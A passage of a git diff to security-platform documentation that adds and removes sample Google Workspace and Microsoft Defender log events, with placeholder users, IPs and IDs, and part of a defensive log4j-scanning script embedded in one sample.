"ORG_UNIT_NAME", + "value": "test_org" + }, + { + "name": "PRODUCT_ID", + "value": "0x2" + }, + { + "name": "PRODUCT_NAME", + "value": "2.0 root hub" + }, + { + "name": "VENDOR_ID", + "value": "0x1ddd" + }, + { + "name": "VENDOR_NAME", + "value": "Linux Foundation" + } + ] + } + ] + } + ``` + + + +=== "test_chrome_sample_2" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-08T13:20:40.000Z", + "uniqueQualifier": "-2392455694764444444444", + "applicationName": "chrome", + "customerId": "C01x7c000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\"", + "actor": { + "callerType": "USER", + "profileId": "105250506097973333333333" + }, + "events": [ + { + "type": "CHROME_OS_LOGIN_LOGOUT_TYPE", + "name": "CHROME_OS_LOGIN_EVENT", + "parameters": [ + { + "name": "TIMESTAMP", + "intValue": "1731072040000" + }, + { + "name": "EVENT_REASON", + "value": "CHROMEOS_KIOSK_SESSION_LOGIN" + }, + { + "name": "DEVICE_NAME", + 
"value": "S5NXNZ00A000000" + }, + { + "name": "DEVICE_USER", + "value": "-" + }, + { + "name": "CLIENT_TYPE", + "value": "CHROME_OS_DEVICE" + }, + { + "name": "DEVICE_PLATFORM", + "value": "ChromeOS 16033.51.0" + }, + { + "name": "DIRECTORY_DEVICE_ID", + "value": "4ebc77ae-ce6b-4857" + }, + { + "name": "ORG_UNIT_NAME", + "value": "test_org" + } + ] + } + ] + } + ``` + + + === "test_drive_sample" @@ -719,58 +922,22 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_groups_entre_sample1" - - - ```json - { - "kind": "admin#reports#activity", - "id": { - "time": "2024-03-11T15:20:33.157Z", - "uniqueQualifier": "-92180609786", - "applicationName": "groups_enterprise", - "customerId": "C03foh000" - }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", - "actor": { - "callerType": "USER", - "email": "joe.done@test.com", - "profileId": "109472445" - }, - "events": [ - { - "type": "moderator_action", - "name": "delete_group", - "parameters": [ - { - "name": "group_id", - "value": "testgroup@test.com" - } - ] - } - ] - } - ``` - - - -=== "test_meet_sample1" +=== "test_end_call" ```json { "kind": "admin#reports#activity", "id": { - "time": "2024-03-13T11:02:40.037Z", - "uniqueQualifier": "235176017661", + "time": "2024-11-14T12:07:37.366Z", + "uniqueQualifier": "-3853857772415670247", "applicationName": "meet", - "customerId": "C03foh000" + "customerId": "C030x4pai" }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\"", "actor": { - "callerType": "USER", - "email": "jone.doe@test.com", - "profileId": "1098488062555" + "callerType": "KEY", + "key": "HANGOUTS_EXTERNAL_OR_ANONYMOUS" }, "events": [ { 
@@ -779,7 +946,11 @@ In this section, you will find examples of raw logs as generated natively by the "parameters": [ { "name": "video_send_seconds", - "intValue": "0" + "intValue": "173" + }, + { + "name": "screencast_recv_bitrate_kbps_mean", + "intValue": "61" }, { "name": "location_country", @@ -787,43 +958,59 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "identifier_type", - "value": "email_address" + "value": "device_id" + }, + { + "name": "audio_send_bitrate_kbps_mean", + "intValue": "0" + }, + { + "name": "video_send_packet_loss_max", + "intValue": "2" }, { "name": "endpoint_id", - "value": "dSzi5ZfqD8I" + "value": "boq_hlane_QGKxiQcCZvF" }, { "name": "device_type", - "value": "web" + "value": "meet_hardware" }, { - "name": "screencast_send_packet_loss_mean", + "name": "video_send_packet_loss_mean", "intValue": "0" }, + { + "name": "screencast_recv_long_side_median_pixels", + "intValue": "1568" + }, { "name": "calendar_event_id", - "value": "glb41ldt739tcf0bun7p9htaqr" + "value": "3ckjqg60dq5j4eu9cgjtdb396c" }, { "name": "screencast_send_seconds", - "intValue": "83" + "intValue": "0" }, { - "name": "screencast_send_short_side_median_pixels", - "intValue": "1080" + "name": "video_send_fps_mean", + "intValue": "30" }, { - "name": "screencast_send_packet_loss_max", + "name": "audio_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "network_send_jitter_msec_mean", "intValue": "1" }, { - "name": "screencast_send_fps_mean", + "name": "screencast_recv_fps_mean", "intValue": "29" }, { "name": "audio_recv_seconds", - "intValue": "0" + "intValue": "33" }, { "name": "network_congestion", @@ -831,7 +1018,11 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "network_estimated_download_kbps_mean", - "intValue": "1" + "intValue": "74" + }, + { + "name": "audio_send_packet_loss_mean", + "intValue": "0" }, { "name": "network_transport_protocol", 
@@ -839,55 +1030,87 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "duration_seconds", - "intValue": "1498" + "intValue": "15317" + }, + { + "name": "video_send_bitrate_kbps_mean", + "intValue": "19" }, { "name": "identifier", - "value": "jone.doe@test.com" + "value": "644e7990-c69d-4e09-8cd2-6ae52406c21c" }, { "name": "location_region", - "value": "Argenteuil" + "value": "Paris" }, { - "name": "screencast_send_bitrate_kbps_mean", - "intValue": "791" + "name": "audio_recv_packet_loss_max", + "intValue": "0" + }, + { + "name": "audio_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_recv_jitter_msec_max", + "intValue": "2" }, { "name": "organizer_email", - "value": "joe.done@test.com" + "value": "tt.test@test.fr" + }, + { + "name": "screencast_recv_short_side_median_pixels", + "intValue": "980" + }, + { + "name": "is_external", + "boolValue": false + }, + { + "name": "network_recv_jitter_msec_mean", + "intValue": "1" }, { "name": "ip_address", - "value": "5555:333:333:5555:5555:5555:5555:5555" + "value": "1.2.3.4" }, { "name": "audio_send_seconds", - "intValue": "0" + "intValue": "15316" }, { "name": "display_name", - "value": "Test SEGLA" + "value": "OLYMPUS (Paris-106T, 8)" }, { - "name": "video_recv_seconds", + "name": "screencast_recv_packet_loss_max", "intValue": "0" }, { - "name": "screencast_send_long_side_median_pixels", - "intValue": "1920" + "name": "video_recv_seconds", + "intValue": "0" }, { "name": "network_rtt_msec_mean", - "intValue": "12" + "intValue": "8" + }, + { + "name": "video_send_long_side_median_pixels", + "intValue": "320" + }, + { + "name": "screencast_recv_packet_loss_mean", + "intValue": "0" }, { "name": "conference_id", - "value": "SQEGZkIp70zCVuvX_PtXDxI" + "value": "rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA" }, { "name": "screencast_recv_seconds", - "intValue": "0" + "intValue": "14874" }, { "name": "product_type", 
@@ -895,15 +1118,15 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "network_estimated_upload_kbps_mean", - "intValue": "0" + "intValue": "7" }, { - "name": "meeting_code", - "value": "GMGSZDDDDD" + "name": "video_send_short_side_median_pixels", + "intValue": "180" }, { - "name": "is_external", - "boolValue": false + "name": "meeting_code", + "value": "ABCDEFGHIJ" } ] } 
@@ -913,36 +1136,420 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_meet_sample2" +=== "test_end_call_no_ip" ```json { "kind": "admin#reports#activity", "id": { - "time": "2024-03-13T10:31:23.630Z", - "uniqueQualifier": "47501654195", + "time": "2024-11-14T11:32:12.301Z", + "uniqueQualifier": "-6765941919309710661", "applicationName": "meet", - "customerId": "C03foh000" + "customerId": "C030x4pai" }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\"", "actor": { - "callerType": "USER", - "email": "jone.done@test.com", - "profileId": "1070981817756" + "callerType": "KEY", + "key": "HANGOUTS_EXTERNAL_OR_ANONYMOUS" }, "events": [ { - "type": "conference_action", - "name": "presentation_started", + "type": "call", + "name": "call_ended", "parameters": [ { - "name": "is_external", - "boolValue": false + "name": "video_send_seconds", + "intValue": "725" }, { - "name": "meeting_code", - "value": "BWXXZYNUUU" + "name": "audio_send_bitrate_kbps_mean", + "intValue": "13" + }, + { + "name": "video_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "endpoint_id", + "value": "boq_hlane_UJtqXZcvBo3" + }, + { + "name": "device_type", + "value": "web" + }, + { + "name": "video_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "video_recv_long_side_median_pixels", + "intValue": "480" + }, + { + "name": "calendar_event_id", + "value": "6cm94j8lp55a9880oj2o0rb3e6" + }, + { + "name": "screencast_send_seconds", + "intValue": "0" + }, + { + "name": "video_send_fps_mean", + "intValue": "30" + }, + { + "name": "audio_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "video_recv_short_side_median_pixels", + "intValue": "270" + }, + { + "name": "video_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_send_jitter_msec_mean", + "intValue": "1" + }, + { + "name": "audio_recv_seconds", + "intValue": "3647" + 
}, + { + "name": "network_congestion", + "intValue": "0" + }, + { + "name": "network_estimated_download_kbps_mean", + "intValue": "1158" + }, + { + "name": "audio_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_transport_protocol", + "value": "tcp" + }, + { + "name": "duration_seconds", + "intValue": "3651" + }, + { + "name": "video_send_bitrate_kbps_mean", + "intValue": "375" + }, + { + "name": "audio_recv_packet_loss_max", + "intValue": "9" + }, + { + "name": "video_recv_fps_mean", + "intValue": "23" + }, + { + "name": "audio_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_recv_jitter_msec_max", + "intValue": "98" + }, + { + "name": "organizer_email", + "value": "tt.test@test.fr" + }, + { + "name": "is_external", + "boolValue": true + }, + { + "name": "network_recv_jitter_msec_mean", + "intValue": "3" + }, + { + "name": "audio_send_seconds", + "intValue": "3647" + }, + { + "name": "display_name", + "value": "Yuki" + }, + { + "name": "video_recv_seconds", + "intValue": "3638" + }, + { + "name": "network_rtt_msec_mean", + "intValue": "11" + }, + { + "name": "video_send_long_side_median_pixels", + "intValue": "480" + }, + { + "name": "conference_id", + "value": "aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA" + }, + { + "name": "screencast_recv_seconds", + "intValue": "3627" + }, + { + "name": "product_type", + "value": "meet" + }, + { + "name": "network_estimated_upload_kbps_mean", + "intValue": "105" + }, + { + "name": "video_send_short_side_median_pixels", + "intValue": "270" + }, + { + "name": "video_recv_packet_loss_max", + "intValue": "0" + }, + { + "name": "meeting_code", + "value": "BUSOHGFTVB" + } + ] + } + ] + } + ``` + + + +=== "test_groups_entre_sample1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-11T15:20:33.157Z", + "uniqueQualifier": "-92180609786", + "applicationName": "groups_enterprise", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + 
"actor": { + "callerType": "USER", + "email": "joe.done@test.com", + "profileId": "109472445" + }, + "events": [ + { + "type": "moderator_action", + "name": "delete_group", + "parameters": [ + { + "name": "group_id", + "value": "testgroup@test.com" + } + ] + } + ] + } + ``` + + + +=== "test_meet_sample1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-13T11:02:40.037Z", + "uniqueQualifier": "235176017661", + "applicationName": "meet", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "actor": { + "callerType": "USER", + "email": "jone.doe@test.com", + "profileId": "1098488062555" + }, + "events": [ + { + "type": "call", + "name": "call_ended", + "parameters": [ + { + "name": "video_send_seconds", + "intValue": "0" + }, + { + "name": "location_country", + "value": "FR" + }, + { + "name": "identifier_type", + "value": "email_address" + }, + { + "name": "endpoint_id", + "value": "dSzi5ZfqD8I" + }, + { + "name": "device_type", + "value": "web" + }, + { + "name": "screencast_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "calendar_event_id", + "value": "glb41ldt739tcf0bun7p9htaqr" + }, + { + "name": "screencast_send_seconds", + "intValue": "83" + }, + { + "name": "screencast_send_short_side_median_pixels", + "intValue": "1080" + }, + { + "name": "screencast_send_packet_loss_max", + "intValue": "1" + }, + { + "name": "screencast_send_fps_mean", + "intValue": "29" + }, + { + "name": "audio_recv_seconds", + "intValue": "0" + }, + { + "name": "network_congestion", + "intValue": "0" + }, + { + "name": "network_estimated_download_kbps_mean", + "intValue": "1" + }, + { + "name": "network_transport_protocol", + "value": "udp" + }, + { + "name": "duration_seconds", + "intValue": "1498" + }, + { + "name": "identifier", + "value": "jone.doe@test.com" + }, + { + "name": "location_region", + "value": "Argenteuil" + }, + { + "name": "screencast_send_bitrate_kbps_mean", + "intValue": "791" + }, + { 
+ "name": "organizer_email", + "value": "joe.done@test.com" + }, + { + "name": "ip_address", + "value": "5555:333:333:5555:5555:5555:5555:5555" + }, + { + "name": "audio_send_seconds", + "intValue": "0" + }, + { + "name": "display_name", + "value": "Test SEGLA" + }, + { + "name": "video_recv_seconds", + "intValue": "0" + }, + { + "name": "screencast_send_long_side_median_pixels", + "intValue": "1920" + }, + { + "name": "network_rtt_msec_mean", + "intValue": "12" + }, + { + "name": "conference_id", + "value": "SQEGZkIp70zCVuvX_PtXDxI" + }, + { + "name": "screencast_recv_seconds", + "intValue": "0" + }, + { + "name": "product_type", + "value": "meet" + }, + { + "name": "network_estimated_upload_kbps_mean", + "intValue": "0" + }, + { + "name": "meeting_code", + "value": "GMGSZDDDDD" + }, + { + "name": "is_external", + "boolValue": false + } + ] + } + ] + } + ``` + + + +=== "test_meet_sample2" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-13T10:31:23.630Z", + "uniqueQualifier": "47501654195", + "applicationName": "meet", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "actor": { + "callerType": "USER", + "email": "jone.done@test.com", + "profileId": "1070981817756" + }, + "events": [ + { + "type": "conference_action", + "name": "presentation_started", + "parameters": [ + { + "name": "is_external", + "boolValue": false + }, + { + "name": "meeting_code", + "value": "BWXXZYNUUU" }, { "name": "conference_id", 
@@ -968,6 +1575,324 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_rules_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:21:46.270Z", + "uniqueQualifier": "233165468629800000000", + "applicationName": "rules", + "customerId": "C02i38888" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": "john.doe@test.com", + "profileId": "113328670183616666666" + }, + "events": [ + { + "type": "action_complete_type", + "name": "action_complete", + "parameters": [ + { + "name": "data_source", + "value": "DRIVE" + }, + { + "name": "resource_id", + "value": "1K23Am8JmHL9vgGwUjUPaq0000000" + }, + { + "name": "resource_owner_email", + "value": "john.doe@test.com" + }, + { + "name": "rule_resource_name", + "value": "policies/aka00000000000" + }, + { + "name": "rule_name", + "value": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN" + }, + { + "name": "rule_type", + "value": "DLP" + }, + { + "name": "matched_detectors", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "detector_id", + "value": "IBAN_CODE" + }, + { + "name": "detector_type", + "value": "PREDEFINED_DLP" + }, + { + "name": "display_name", + "value": "IBAN_CODE" + } + ] + } + ] + }, + { + "name": "triggered_actions", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "action_type", + "value": "DRIVE_WARN_ON_EXTERNAL_SHARING" + } + ] + } + ] + }, + { + "name": "resource_recipients", + "multiValue": [ + "john.doe@test.com" + ] + }, + { + "name": "scan_type", + "value": "DRIVE_ONLINE_SCAN" + }, + { + "name": "matched_trigger", + "value": "DRIVE_SHARE" + }, + { + "name": "severity", + "value": "LOW" + }, + { + "name": "resource_type", + "value": "DOCUMENT" + }, + { + "name": "resource_title", + "value": "8157822-2024-11-7-15-21-0" + } + ] + } + ] + } + ``` + + + +=== "test_rules_sample_2" + + + ```json + { + "kind": "admin#reports#activity", + 
"id": { + "time": "2024-11-07T14:21:46.270Z", + "uniqueQualifier": "-49907177521610000000", + "applicationName": "rules", + "customerId": "C02i38888" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\"", + "actor": { + "email": "john.doe@test.com", + "profileId": "11332867018361686666666" + }, + "events": [ + { + "type": "content_matched_type", + "name": "content_matched", + "parameters": [ + { + "name": "data_source", + "value": "DRIVE" + }, + { + "name": "resource_id", + "value": "1K23Am8JmHL9vgGwUjUPaqDZV" + }, + { + "name": "resource_owner_email", + "value": "john.doe@test.com" + }, + { + "name": "rule_resource_name", + "value": "policies/aka000000000" + }, + { + "name": "rule_name", + "value": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN" + }, + { + "name": "rule_type", + "value": "DLP" + }, + { + "name": "matched_detectors", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "detector_id", + "value": "IBAN_CODE" + }, + { + "name": "detector_type", + "value": "PREDEFINED_DLP" + }, + { + "name": "display_name", + "value": "IBAN_CODE" + } + ] + } + ] + }, + { + "name": "triggered_actions", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "action_type", + "value": "DRIVE_WARN_ON_EXTERNAL_SHARING" + } + ] + } + ] + }, + { + "name": "resource_recipients", + "multiValue": [ + "john.doe@test.com" + ] + }, + { + "name": "scan_type", + "value": "DRIVE_ONLINE_SCAN" + }, + { + "name": "severity", + "value": "LOW" + }, + { + "name": "resource_type", + "value": "DOCUMENT" + }, + { + "name": "resource_title", + "value": "8157822-2024-11-7-15-21-0" + } + ] + } + ] + } + ``` + + + +=== "test_saml_login_success" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:26:15.515Z", + "uniqueQualifier": "4091348940000000", + "applicationName": "saml", + "customerId": "C00000000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": 
"John.doe@test.com", + "profileId": "10344515534360000000" + }, + "ipAddress": "2.1.3.2", + "events": [ + { + "type": "login", + "name": "login_success", + "parameters": [ + { + "name": "orgunit_path", + "value": "/test/implementation" + }, + { + "name": "initiated_by", + "value": "sp" + }, + { + "name": "application_name", + "value": "AWS" + }, + { + "name": "saml_status_code", + "value": "SUCCESS_URI" + } + ] + } + ] + } + ``` + + + +=== "test_saml_login_success_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:24:58.191Z", + "uniqueQualifier": "-318965716033600000", + "applicationName": "saml", + "customerId": "C000000000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": "John.doe@test.com", + "profileId": "113844576558700000000" + }, + "ipAddress": "8.6.15.1", + "events": [ + { + "type": "login", + "name": "login_success", + "parameters": [ + { + "name": "orgunit_path", + "value": "/test/dev" + }, + { + "name": "initiated_by", + "value": "sp" + }, + { + "name": "application_name", + "value": "AWS Client VPN" + }, + { + "name": "saml_status_code", + "value": "SUCCESS_URI" + } + ] + } + ] + } + ``` + + + === "test_suspend_user" diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md index 4dacb4fa8..304cfe59f 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md 
@@ -639,6 +639,66 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_cloud_app4.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\"
:false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": 
\"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } + + ``` + + === "test_connection_acknowledged.json" ```json 
@@ -763,61 +823,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "test_deivce_events_2.json" - - ```json - - { - "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path 
\\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def 
